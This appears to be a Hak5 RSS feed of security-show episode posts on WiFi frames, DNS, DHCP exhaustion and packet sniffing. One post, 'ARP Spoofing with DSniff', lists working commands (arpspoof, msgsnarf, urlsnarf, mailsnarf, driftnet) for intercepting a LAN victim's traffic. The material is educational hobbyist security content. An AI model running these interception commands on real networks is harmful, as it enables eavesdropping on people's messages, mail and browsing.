<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hak5 - Technolust since 2005 &#187; Packet</title>
	<atom:link href="http://Hak5.org/tag/packet/feed" rel="self" type="application/rss+xml" />
	<link>http://Hak5.org</link>
	<description>Trust Your Technolust</description>
	<lastBuildDate>Thu, 17 May 2012 20:49:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>HakTip 17 &#8211; WiFi 101: 802.11 Frames</title>
		<link>http://Hak5.org/episodes/haktip-17</link>
		<comments>http://Hak5.org/episodes/haktip-17#comments</comments>
		<pubDate>Tue, 19 Jul 2011 03:05:17 +0000</pubDate>
		<dc:creator>Jason</dc:creator>
				<category><![CDATA[Episodes]]></category>
		<category><![CDATA[HakTip]]></category>
		<category><![CDATA[802.11]]></category>
		<category><![CDATA[association]]></category>
		<category><![CDATA[authorization]]></category>
		<category><![CDATA[beacon]]></category>
		<category><![CDATA[control]]></category>
		<category><![CDATA[data]]></category>
		<category><![CDATA[deauth]]></category>
		<category><![CDATA[frame]]></category>
		<category><![CDATA[management]]></category>
		<category><![CDATA[Packet]]></category>
		<category><![CDATA[probe]]></category>
		<category><![CDATA[wifi]]></category>

		<guid isPermaLink="false">http://Hak5.org/?p=3859</guid>
		<description><![CDATA[<object width="640" height="360"><param name="movie" value="http://www.youtube.com/v/CWvNY6CbTs4?version=3&#038;hl=en_US&#038;fs=1&#038;hd=1&#038;autohide=1&#038;showinfo=0&#038;rel=0&#038;showsearch=0" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed type="application/x-shockwave-flash" width="640" height="360" src="http://www.youtube.com/v/CWvNY6CbTs4?version=3&#038;hl=en_US&#038;fs=1&#038;hd=1&#038;autohide=1&#038;showinfo=0&#038;rel=0&#038;showsearch=0" wmode="transparent" allowfullscreen="true" allowscriptaccess="always"></embed></object>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fhaktip-17"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fhaktip-17&amp;source=Hak5&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Today we&#8217;re diving into the do-dads that make up 802.11, or to be more specific we&#8217;ll be going over WiFi frames. It is with careful use or abuse of these frames we&#8217;re able to acomplish some pretty nifty tricks. </p>
<div style="clear:both;"></div>
<p><a class="mov" href="http://videos.revision3.com/revision3/web/hak5/haktip/0017/hak5--haktip--0017--wifi-frames--hd720p30.h264.mp4">Download HD</a> <a class="mov" href="http://videos.revision3.com/revision3/web/hak5/haktip/0017/hak5--haktip--0017--wifi-frames--large.h264.mp4">Download MP4</a> <a class="wmv" href="http://videos.revision3.com/revision3/web/hak5/haktip/0017/hak5--haktip--0017--wifi-frames--large.wmv9.wmv">Download WMV</a></p>
<p><span id="more-3859"></span></p>
<div align="center">
<object width="640" height="360"><param name="movie" value="http://www.youtube.com/v/CWvNY6CbTs4?version=3&#038;hl=en_US&#038;fs=1&#038;hd=1&#038;autohide=1&#038;showinfo=0&#038;rel=0&#038;showsearch=0" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed type="application/x-shockwave-flash" width="640" height="360" src="http://www.youtube.com/v/CWvNY6CbTs4?version=3&#038;hl=en_US&#038;fs=1&#038;hd=1&#038;autohide=1&#038;showinfo=0&#038;rel=0&#038;showsearch=0" wmode="transparent" allowfullscreen="true" allowscriptaccess="always"></embed></object>
</div>
<p>If you&#8217;re not familiar a frame is simply a data packet. For example, on an Ethernet network a frame is a bunch of data sent from a network card consisting of a header, a payload, and an integrity check of some sort.</p>
<p>The payload itself is simply a protocol packet, typically of the IP variety but it could be anything. The payload is encapsulated, or enclosed, within elements that make up the frame overhead. For example, an 802.3 ethernet frame will begin with the source and destination MAC addresses, as well the EtherType, which is basically a field that defines what kind of protocol is inside. Think of it as the envelope on a letter. The frame will end with a Frame Check Sequence which is a special checksum of the frame. The receiving party uses the Frame Check Sequence to verify the integrity of the frame as a whole. If something gets borked &#8212; due to, say, interference on the line &#8212; the receiving party will ask for the sender to resend the frame.</p>
<p>Now for the most part 802.11 frames, or WiFi frames, work very similarly and it is with careful use or abuse of these frames we&#8217;re able to acomplish some pretty nifty tricks. So, as always, on to the terms.</p>
<p>Now without getting into every octet or bit within a frame, suffice it to say that WiFi frames are made up of the same kind of stuff as Ethernet frames. They contain source and destination MAC addresses. They&#8217;ll also contain control fields for specifying what version of the 802.11 protocol they&#8217;re using. Again the payload could be anything, like the millions of TCP or UDP packets that make up this video, then they finally end with a frame check sequence.</p>
<p>There are three major kinds of frames in 802.11. Management frames, Control Frames, and Data frames.</p>
<p>Let&#8217;s begin with Management frames. There are four types of management frames: Beacon, Probe, Association and Authentication.</p>
<p>A beacon frame is one that an access point or base station preiodically sends out announcing its presence to the world. It will include things like the SSID or service set identifier. We&#8217;ll get into the specifics of these in greater detail soon.</p>
<p>The next type of management frame is a probe. Probes come in two flavors: requests and responses. A probe request is one that usually comes from a client. Think of it as your laptop or iphone calling out for an access point, asking whether it&#8217;s within range, or trying to get details from an access point it has seen a beacon from.</p>
<p>The probe request is typically followed by a probe response. The access point will send one of these when it hears a probe request. The response will include data pertinent to establishing a connection, such as what data rates that the station supports.</p>
<p>The next type of management frame is association. These come in three flavors: association requests, association responses and disassociation frames.</p>
<p>Association requests are simply that. It&#8217;s a frame sent from one station to another asking if they can be friends. They&#8217;ll say, among other things, &#8220;hey, can you allocate some memory for me&#8221; and &#8220;let&#8217;s synchronize our watches so we can more effectively communicate.&#8221; </p>
<p>An association request frame is typically followed by an association response frame, which will either be acceptance &#8212; &#8220;Sure, let&#8217;s be friends!&#8221; or rejection.</p>
<p>When two stations want to say &#8220;peace out yo&#8221; they send a disassociation frame. It&#8217;s a polite thing to do as it allows the other party to unallocate memory and other such clean up functions.</p>
<p>The final kind of management frame is authentication. These come in two flavors, authentication and deauthentication. </p>
<p>The aptly named authentication or auth frames begin the process of authentication. In the case of an open access point only two auth frames are exchanged, one asking for access and one saying &#8220;come on in &#8216;pardner&#8221;. In the case of the pathetically weak WEP authentication standard the client will send an auth frame asking for access, the station will respond with an auth frame containing bit of text. This is known as a challenge. And finally the client will send a version of that text back having encrypted it with the WEP key.</p>
<p>The authentication process for WPA and WPA2 are a lot more complex and we&#8217;ll get to those as this series progresses.</p>
<p>This brings us to the last management frame: deauthentication or deauth. A deauth frame is sent from one station to another to terminate a secure session. The stations may still be associated, but effectively they&#8217;re not speaking to one another.</p>
<p>With Management frames covered, let&#8217;s go over the last two types of frames: Control and Data.</p>
<p>Control frames come in three varities: Request to Send, Clear to Send, and Acknowledgement frames.</p>
<p>A request to send or RTS fame, as the name would imply, is a short little frame that one station sends to another asking if it can send a data frame. It&#8217;s the first part of the two-way handshake that make up tbe beginning of any data transmission.</p>
<p>The second part of the handshake is the Clear to Send or CTS frame. If the station isn&#8217;t busy doing other things it&#8217;ll send one of these in response to an RTS. The neat thing about this frame is that it&#8217;ll specify an amount of time for which the two stations can communicate. The other stations in the area observe this and wait patiently. This minimizes interruptions that would otherwise cause interference resulting in resends and an overall degradation of network performance.</p>
<p>And finally after the RTS / CTS handshake has taken place and the data frames have been sent the receiving station will issue an Acknowledgement or ACK frame. This lets the sender know that everything was received in good condition. If the receiver checks the integrity of the data frames and something is borked it will simply withhold the ACK frame, causing the sender to retry.</p>
<p>And the last frame, as we just mentioned, is the data frame. Containing anything you like inside, these guys are the workhorses of WiFi. Of course they wouldn&#8217;t exist without the diligent work of the management and control frames, so, good job everyone. Let&#8217;s have some cake!</p>
<p>What programs or commands are rocking your world? What technologies are tickling your technolust? Hit me up &#8212; <a href="mailto:tips@hak5.org">tips@hak5.org</a></p>
<p>And be sure to check out our sister show, <a href="http://www.hak5.org">Hak5</a> for more great stuff just like this.</p>
<p>With more than 23 million members, Netflix is the world’s largest subscription service instantly streaming TV episodes and movies over the Internet. For one low monthly price, Netflix unlimited members can instantly watch TV episodes &#038; movies streaming to their TVs and computers. With Netflix you can cancel anytime. Netflix unlimited members can instantly watch thousands of titles on a vast array of devices streaming TV episodes and movies like Microsoft’s Xbox 360, Sony’s PS3 game console and the Nintendo Wii console. Find movies you love &#8211; easily! As a Netflix unlimited member you can instantly watch as many movies as you want anytime you want for one low monthly price! You can cancel anytime. Get your FREE Trial membership. Go to <a href="http://www.netflix.com/hak5" target="_blank">netflix.com/hak5</a> and sign up NOW. Be sure to use this URL so that they know we sent you!</p>
]]></content:encoded>
			<wfw:commentRss>http://Hak5.org/episodes/haktip-17/feed</wfw:commentRss>
		<slash:comments>46</slash:comments>
<enclosure url="http://videos.revision3.com/revision3/web/hak5/haktip/0017/hak5--haktip--0017--wifi-frames--hd720p30.h264.mp4" length="0" type="video/mp4" />
<enclosure url="http://videos.revision3.com/revision3/web/hak5/haktip/0017/hak5--haktip--0017--wifi-frames--large.h264.mp4" length="0" type="video/mp4" />
<enclosure url="http://videos.revision3.com/revision3/web/hak5/haktip/0017/hak5--haktip--0017--wifi-frames--large.wmv9.wmv" length="0" type="video/asf" />
		</item>
		<item>
		<title>ARP Spoofing with DSniff</title>
		<link>http://Hak5.org/hack/arp-spoofing-with-dsniff</link>
		<comments>http://Hak5.org/hack/arp-spoofing-with-dsniff#comments</comments>
		<pubDate>Thu, 14 Apr 2011 05:01:51 +0000</pubDate>
		<dc:creator>paul</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[apt-get]]></category>
		<category><![CDATA[arpspoof]]></category>
		<category><![CDATA[command line]]></category>
		<category><![CDATA[driftnet]]></category>
		<category><![CDATA[dsniff]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[nets]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[Packet]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://www.Hak5.org/?p=3253</guid>
		<description><![CDATA[
			
				
			
		
This segment with Darren he demos a couple of tools for us linux folks.



Again the premise is all the same. We’ll be using command line tools to tell our victim we’re the router, and vise ...]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2FHak5.org%2Fhack%2Farp-spoofing-with-dsniff"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2FHak5.org%2Fhack%2Farp-spoofing-with-dsniff&amp;source=Hak5&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>This segment with Darren he demos a couple of tools for us linux folks.</p>
<div style="clear:both;"></div>
<p><span id="more-3253"></span></p>
<p><object width="555" height="312"><param name="movie" value="http://www.youtube.com/v/ArxUZnmS3NY?version=3&amp;hl=en_US&amp;fs=1&amp;hd=1&amp;showinfo=0&amp;rel=0&amp;showsearch=0&amp;start=641" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed type="application/x-shockwave-flash" width="555" height="312" src="http://www.youtube.com/v/ArxUZnmS3NY?version=3&amp;hl=en_US&amp;fs=1&amp;hd=1&amp;showinfo=0&amp;rel=0&amp;showsearch=0&amp;start=641" wmode="transparent" allowfullscreen="true" allowscriptaccess="always"></embed></object></p>
<p>Again the premise is all the same. We’ll be using command line tools to tell our victim we’re the router, and vise versa.</p>
<p>The tools we’ll be using are the dsniff suite and driftnet. If you don’t already have ‘em and you’re rocking Ubuntu it’s simply a matter of issuing sudo apt-get install driftnet dsniff</p>
<p>Before we get our attack started we’ll need to enable packet forwarding. This means we’ll allow the traffic of our targets to flow through our machine.</p>
<p><code></p>
<p>cat /proc/sys/net/ipv4/ip_forward<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
cat /proc/sys/net/ipv4/ip_forward</p>
<p>screen<br />
arpspoof -t 10.13.37.1 10.13.37.124<br />
arpspoof -t 10.13.37.1 10.13.37.124</p>
<p>msgsnarf -i eth0<br />
urlsnart -i eth0<br />
mailsnarf -i eth0</p>
<p>driftnet -i eth0</p>
<p>killall arpspoof</code></p>
]]></content:encoded>
			<wfw:commentRss>http://Hak5.org/hack/arp-spoofing-with-dsniff/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Tools for Messing Around with DNS</title>
		<link>http://Hak5.org/hack/tools-for-messing-around-with-dns</link>
		<comments>http://Hak5.org/hack/tools-for-messing-around-with-dns#comments</comments>
		<pubDate>Mon, 18 Oct 2010 02:45:47 +0000</pubDate>
		<dc:creator>paul</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[dig]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[domain name]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[host]]></category>
		<category><![CDATA[nslookup]]></category>
		<category><![CDATA[Packet]]></category>
		<category><![CDATA[port]]></category>
		<category><![CDATA[record]]></category>
		<category><![CDATA[Router]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[sniff]]></category>
		<category><![CDATA[system name]]></category>

		<guid isPermaLink="false">http://www.Hak5.org/?p=3046</guid>
		<description><![CDATA[
			
				
			
		
This segment Darren goes over some of the tools to do some interesting things with DNS and hak6.org.



]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2FHak5.org%2Fhack%2Ftools-for-messing-around-with-dns"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2FHak5.org%2Fhack%2Ftools-for-messing-around-with-dns&amp;source=Hak5&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>This segment Darren goes over some of the tools to do some interesting things with DNS and hak6.org.</p>
<div style="clear:both;"></div>
<p><span id="more-3046"></span></p>
<p><object width="555" height="312"><param name="movie" value="http://www.youtube.com/v/2hMkSNiBPvE?version=3&amp;hl=en_US&amp;fs=1&amp;hd=1&amp;showinfo=0&amp;rel=0&amp;showsearch=0&amp;start=1929" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed type="application/x-shockwave-flash" width="555" height="312" src="http://www.youtube.com/v/2hMkSNiBPvE?version=3&amp;hl=en_US&amp;fs=1&amp;hd=1&amp;showinfo=0&amp;rel=0&amp;showsearch=0&amp;start=1929" wmode="transparent" allowfullscreen="true" allowscriptaccess="always"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://Hak5.org/hack/tools-for-messing-around-with-dns/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Introduction to DNS Design</title>
		<link>http://Hak5.org/geek/introduction-to-dns-design</link>
		<comments>http://Hak5.org/geek/introduction-to-dns-design#comments</comments>
		<pubDate>Mon, 18 Oct 2010 01:49:42 +0000</pubDate>
		<dc:creator>paul</dc:creator>
				<category><![CDATA[Geek]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[domain]]></category>
		<category><![CDATA[domain name]]></category>
		<category><![CDATA[nslookup]]></category>
		<category><![CDATA[Packet]]></category>
		<category><![CDATA[port]]></category>
		<category><![CDATA[record]]></category>
		<category><![CDATA[Router]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[server host]]></category>
		<category><![CDATA[system name]]></category>

		<guid isPermaLink="false">http://www.Hak5.org/?p=3041</guid>
		<description><![CDATA[
			
				
			
		
Space cadet Darren explains a bit of the design and characteristic of DNS.



This is more of just a guide to how DNS works and explanation of many of its components.
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2FHak5.org%2Fgeek%2Fintroduction-to-dns-design"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2FHak5.org%2Fgeek%2Fintroduction-to-dns-design&amp;source=Hak5&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Space cadet Darren explains a bit of the design and characteristic of DNS.</p>
<div style="clear:both;"></div>
<p><span id="more-3041"></span></p>
<p><object width="555" height="312"><param name="movie" value="http://www.youtube.com/v/2hMkSNiBPvE?version=3&amp;hl=en_US&amp;fs=1&amp;hd=1&amp;showinfo=0&amp;rel=0&amp;showsearch=0&amp;start=138" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed type="application/x-shockwave-flash" width="555" height="312" src="http://www.youtube.com/v/2hMkSNiBPvE?version=3&amp;hl=en_US&amp;fs=1&amp;hd=1&amp;showinfo=0&amp;rel=0&amp;showsearch=0&amp;start=138" wmode="transparent" allowfullscreen="true" allowscriptaccess="always"></embed></object></p>
<p>This is more of just a guide to how DNS works and explanation of many of its components.</p>
]]></content:encoded>
			<wfw:commentRss>http://Hak5.org/geek/introduction-to-dns-design/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Episode 809 &#8211; Hacking DNS from beginning to end</title>
		<link>http://Hak5.org/episodes/episode-809</link>
		<comments>http://Hak5.org/episodes/episode-809#comments</comments>
		<pubDate>Sun, 17 Oct 2010 05:47:01 +0000</pubDate>
		<dc:creator>Darren Kitchen</dc:creator>
				<category><![CDATA[Episodes]]></category>
		<category><![CDATA[Season 8]]></category>
		<category><![CDATA[dig]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[domain name system]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hak.5]]></category>
		<category><![CDATA[host]]></category>
		<category><![CDATA[name server]]></category>
		<category><![CDATA[nslookup]]></category>
		<category><![CDATA[Packet]]></category>
		<category><![CDATA[port]]></category>
		<category><![CDATA[record]]></category>
		<category><![CDATA[Router]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[sniff]]></category>

		<guid isPermaLink="false">http://www.hak5.org/?p=2395</guid>
		<description><![CDATA[<object width="555" height="312"><param name="movie" value="http://www.youtube.com/v/2hMkSNiBPvE&#038;hl=en_US&#038;fs=1&#038;hd=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/2hMkSNiBPvE&#038;hl=en_US&#038;fs=1&#038;hd=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="555" height="312" wmode="transparent"></embed></object>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-809"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-809&amp;source=Hak5&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>In this high as a kite edition of Hak5 Darren takes you on an adventure through the wonderful world of DNS. Explore the vast and intricate details of our beloved Domain Name System while exploiting mis-configured routers, brute forcing, and even looking up Wikipedia entries from TXT records.</p>
<div style="clear:both;"></div>
<p><a class="mov" href="http://www.podtrac.com/pts/redirect.mp4/videos.revision3.com/revision3/web/hak5/0809/hak5--0809--dns-brute-force-part-2--hd720p30.h264.mp4">Download HD</a> <a class="mov" href="http://www.podtrac.com/pts/redirect.mp4/videos.revision3.com/revision3/web/hak5/0809/hak5--0809--dns-brute-force-part-2--large.h264.mp4">Download MP4</a> <a class="xvid" href="http://www.podtrac.com/pts/redirect.avi/videos.revision3.com/revision3/web/hak5/0809/hak5--0809--dns-brute-force-part-2--large.xvid.avi">Download XviD</a> <a class="wmv" href="http://www.podtrac.com/pts/redirect.wmv/videos.revision3.com/revision3/web/hak5/0809/hak5--0809--dns-brute-force-part-2--large.wmv9.wmv">Download WMV</a></p>
<p><span id="more-2395"></span></p>
<p><object width="555" height="312"><param name="movie" value="http://www.youtube.com/v/2hMkSNiBPvE&#038;hl=en_US&#038;fs=1&#038;hd=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/2hMkSNiBPvE&#038;hl=en_US&#038;fs=1&#038;hd=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="555" height="312" wmode="transparent"></embed></object></p>
<p>Keep up with the latest on Hak5 by follow us on <a href="http://www.twitter.com/hak5/" target="_blank">Twitter</a> or <a href="http://www.facebook.com/technolust/" target="_blank">Facebook</a>. <a href="http://revision3.com/hak5/subscribe" target="_blank">Subscribe</a> and get your weekly technolust delivered automatically. Or show your support and grab some swag from the <a href="http://hak5.org/store" target="_blank">HakShop</a> &#8211; including the new airport friendly <a href="http://www.hak5.org/store/wifi-pineapple-version-2" target="_blank">WiFi Pineapple</a> and <a href="http://www.hak5.org/store/hak5-hoodie" target="_blank">hoodie</a>. Finally if you&#8217;d like to suggest a topic for ask a question feel free to hit up <a href="mailto:feedback@hak5.org">feedback@hak5.org</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://Hak5.org/episodes/episode-809/feed</wfw:commentRss>
		<slash:comments>40</slash:comments>
<enclosure url="http://www.podtrac.com/pts/redirect.mp4/videos.revision3.com/revision3/web/hak5/0809/hak5--0809--dns-brute-force-part-2--hd720p30.h264.mp4" length="222" type="video/mp4" />
<enclosure url="http://www.podtrac.com/pts/redirect.mp4/videos.revision3.com/revision3/web/hak5/0809/hak5--0809--dns-brute-force-part-2--large.h264.mp4" length="219" type="video/mp4" />
<enclosure url="http://www.podtrac.com/pts/redirect.avi/videos.revision3.com/revision3/web/hak5/0809/hak5--0809--dns-brute-force-part-2--large.xvid.avi" length="219" type="video/avi" />
<enclosure url="http://www.podtrac.com/pts/redirect.wmv/videos.revision3.com/revision3/web/hak5/0809/hak5--0809--dns-brute-force-part-2--large.wmv9.wmv" length="219" type="video/asf" />
		</item>
		<item>
		<title>Episode 702 – DHCP Exhaustion and DNS Man-in-the-Middle</title>
		<link>http://Hak5.org/episodes/episode-702</link>
		<comments>http://Hak5.org/episodes/episode-702#comments</comments>
		<pubDate>Wed, 24 Feb 2010 13:17:58 +0000</pubDate>
		<dc:creator>Darren Kitchen</dc:creator>
				<category><![CDATA[Episodes]]></category>
		<category><![CDATA[Season 7]]></category>
		<category><![CDATA[arp]]></category>
		<category><![CDATA[cain]]></category>
		<category><![CDATA[DHCP]]></category>
		<category><![CDATA[DHCP Exhaustion]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[eavesdrop]]></category>
		<category><![CDATA[ettercap]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[man in the middle]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[mitm]]></category>
		<category><![CDATA[Packet]]></category>
		<category><![CDATA[packetsniff]]></category>
		<category><![CDATA[sniff]]></category>

		<guid isPermaLink="false">http://www.hak5.org/?p=1719</guid>
		<description><![CDATA[<embed class="rev3PlayerEmbed" type="application/x-shockwave-flash" src="http://revision3.com/player-v4747" allowFullScreen="true" quality="high" allowScriptAccess="always" width="555" height="312" wmode="transparent"  />]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-702"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-702&amp;source=Hak5&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>With a mixture of in-studio and on location in Dublin this week we&#8217;re talking to Robin Wood about DHCP Exhaustion and DNS Man-in-the-Middle attacks, talking Metasploit modules and a Pineapple Monkey half-breed.</p>
<div style="clear:both;"></div>
<p><a class="mov" href="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0702/hak5--0702--dhcpdnsmitm--hd720p30.h264.mp4">Download HD</a> <a class="mov" href="http://www.podtrac.com/pts/redirect.mp4/bitcast-a.bitgravity.com/revision3/web/hak5/0702/hak5--0702--dhcpdnsmitm--large.h264.mp4">Download MP4</a> <a class="xvid" href="http://www.podtrac.com/pts/redirect.avi/bitcast-a.bitgravity.com/revision3/web/hak5/0702/hak5--0702--dhcpdnsmitm--large.xvid.avi">Download XviD</a> <a class="wmv" href="http://www.podtrac.com/pts/redirect.wmv/bitcast-a.bitgravity.com/revision3/web/hak5/0702/hak5--0702--dhcpdnsmitm--large.wmv9.wmv">Download WMV</a></p>
<p><span id="more-1719"></span></p>
<p><embed class="rev3PlayerEmbed" type="application/x-shockwave-flash" src="http://revision3.com/player-v4747" allowFullScreen="true" quality="high" allowScriptAccess="always" width="555" height="312" wmode="transparent"  /></p>
<p><b>DHCP Exhaustion and DNS Man-in-the-Middle Attacks</b></p>
<p>
Rather than your typical ARP based Man-In-The-Middle attack, Robin wood brings us two metasploit modules for both denial of service attacking a DHCP server and deploying a rogue DHCP server of your own with a DNS MiTM to boot. Check out the <a href="http://www.digininja.org/metasploit/dns_dhcp_beta.php" target="_blank">Metasploit DNS and DHCP Exhaustion &#8211; BETA</a> at <a href="http://www.digininja.org/" target="_blank">Digininja.org</a>.
</p>
<p><b>The JasagerInterceptor &#8211; a Pineapple Monkey mashup</b></p>
<p>
This week we take a look within the community and highlight some of the awesome work done by <a href="http://forums.hak5.org/index.php?showuser=7850" target="_blank">Beakmyn</a>. In an answer to <a href="http://forums.hak5.org/index.php?showtopic=12682" target="_blank">Deathray&#8217;s thread</a> on a Jasager with a network tap like the Interceptor, he brings you just such project. Behold the <a href="http://frontiernet.net/~beakmyn/JasagerIntercept_Install.html" target="_blank">JasagerInterceptor</a>. I&#8217;ve seen it with my own eyes at Shmoocon and I must say it&#8217;s a nifty bit of kit.</p>
]]></content:encoded>
			<wfw:commentRss>http://Hak5.org/episodes/episode-702/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Episode 515 &#8211; Build your own SAN, PSP Hacking, Net Grep</title>
		<link>http://Hak5.org/episodes/episode-515-build-your-own-san-psp-hacking-net-grep</link>
		<comments>http://Hak5.org/episodes/episode-515-build-your-own-san-psp-hacking-net-grep#comments</comments>
		<pubDate>Wed, 27 May 2009 06:54:21 +0000</pubDate>
		<dc:creator>Darren Kitchen</dc:creator>
				<category><![CDATA[Episodes]]></category>
		<category><![CDATA[Season 5]]></category>
		<category><![CDATA[3ware]]></category>
		<category><![CDATA[capacity planner]]></category>
		<category><![CDATA[chick hen]]></category>
		<category><![CDATA[datacore]]></category>
		<category><![CDATA[esata]]></category>
		<category><![CDATA[freenas]]></category>
		<category><![CDATA[goldeneye  source]]></category>
		<category><![CDATA[grep]]></category>
		<category><![CDATA[h commerce]]></category>
		<category><![CDATA[h*commerce]]></category>
		<category><![CDATA[hen]]></category>
		<category><![CDATA[homebrew]]></category>
		<category><![CDATA[mcafee]]></category>
		<category><![CDATA[NAS]]></category>
		<category><![CDATA[network grep]]></category>
		<category><![CDATA[ngrep]]></category>
		<category><![CDATA[open source]]></category>
		<category><![CDATA[Packet]]></category>
		<category><![CDATA[packet filter]]></category>
		<category><![CDATA[Packet Sniff]]></category>
		<category><![CDATA[psp]]></category>
		<category><![CDATA[psp 3000]]></category>
		<category><![CDATA[qnap]]></category>
		<category><![CDATA[raid]]></category>
		<category><![CDATA[SAN]]></category>
		<category><![CDATA[san melody]]></category>
		<category><![CDATA[Storage Area Network]]></category>
		<category><![CDATA[tcp]]></category>
		<category><![CDATA[team typhoon]]></category>
		<category><![CDATA[udp]]></category>
		<category><![CDATA[Virtual Machine]]></category>
		<category><![CDATA[VM]]></category>
		<category><![CDATA[VMware]]></category>

		<guid isPermaLink="false">http://www.hak5.org/?p=1148</guid>
		<description><![CDATA[<embed type="application/x-shockwave-flash" src="http://revision3.com/player-v2820" allowfullscreen="true" width="555" height="312"  />]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-515-build-your-own-san-psp-hacking-net-grep"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2FHak5.org%2Fepisodes%2Fepisode-515-build-your-own-san-psp-hacking-net-grep&amp;source=Hak5&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><a href="http://www.jenncutter.com" target="_blank">Jenn Cutter</a> of <a href="http://www.openalpha.tv" target="_blank">Open Alpha</a> fame joins us to talk about recent developments in PSP hacking and homebrew. Matt&#8217;s got answers to your questions about rolling your own Storage Area Network for all your virtualization needs, and Darren&#8217;s filtering packets in the console with ngrep.</p>
<div style="clear:both;"></div>
